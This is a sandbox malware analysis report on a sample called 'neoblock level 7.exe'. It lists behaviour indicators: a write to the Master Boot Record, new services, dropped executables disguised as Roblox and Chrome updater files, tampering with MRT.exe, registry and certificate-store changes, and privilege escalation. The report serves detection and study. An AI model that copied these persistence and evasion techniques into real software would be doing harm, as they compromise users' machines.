Malware Analysis Report

2024-09-23 10:37

Sample ID 240614-wfl2xs1ald
Target neoblock level 7.exe
SHA256 da0602bb021ceeaeae97ed4268ee25dec1f9edbc482ae72e6768063e5f452226
Tags
bootkit evasion execution persistence
score
10/10

Analysis Overview

score
10/10

SHA256

da0602bb021ceeaeae97ed4268ee25dec1f9edbc482ae72e6768063e5f452226

Threat Level: Known bad

The file neoblock level 7.exe was found to be: Known bad.

Malicious Activity Summary

bootkit evasion execution persistence

Suspicious use of NtCreateProcessExOtherParentProcess

Suspicious use of NtCreateUserProcessOtherParentProcess

Sets service image path in registry

Command and Scripting Interpreter: PowerShell

Creates new service(s)

Stops running service(s)

Checks computer location settings

Checks BIOS information in registry

Loads dropped DLL

Executes dropped EXE

Enumerates connected drives

Writes to the Master Boot Record (MBR)

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Launches sc.exe

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of UnmapMainImage

Uses Task Scheduler COM API

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Modifies Internet Explorer settings

Suspicious use of SendNotifyMessage

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-14 17:52

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-14 17:51

Reported

2024-06-14 17:54

Platform

win10v2004-20240508-en

Max time kernel

136s

Max time network

130s

Command Line

winlogon.exe

Signatures

Creates new service(s)

persistence execution

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" C:\Windows\System32\WaaSMedicAgent.exe N/A

Stops running service(s)

evasion execution

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\N: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\svchost.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PHYSICALDRIVE0 C:\Windows\system32\wbem\wmiprvse.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx C:\Windows\System32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx C:\Windows\System32\svchost.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\ccccc.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Logs\CBS\CBS.log C:\Windows\servicing\TrustedInstaller.exe N/A
File opened for modification C:\Windows\WindowsUpdate.log C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log C:\Windows\system32\svchost.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\System32\mousocoreworker.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\System32\mousocoreworker.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wbem\wmiprvse.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\System32\mousocoreworker.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WaaSMedicAgent.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion C:\Windows\System32\mousocoreworker.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" C:\Windows\system32\sihost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" C:\Windows\system32\sihost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\Explorer.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ccccc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ccccc.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ccccc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ccccc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ccccc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ccccc.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe N/A
N/A N/A C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe N/A
N/A N/A C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\dialer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dialer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
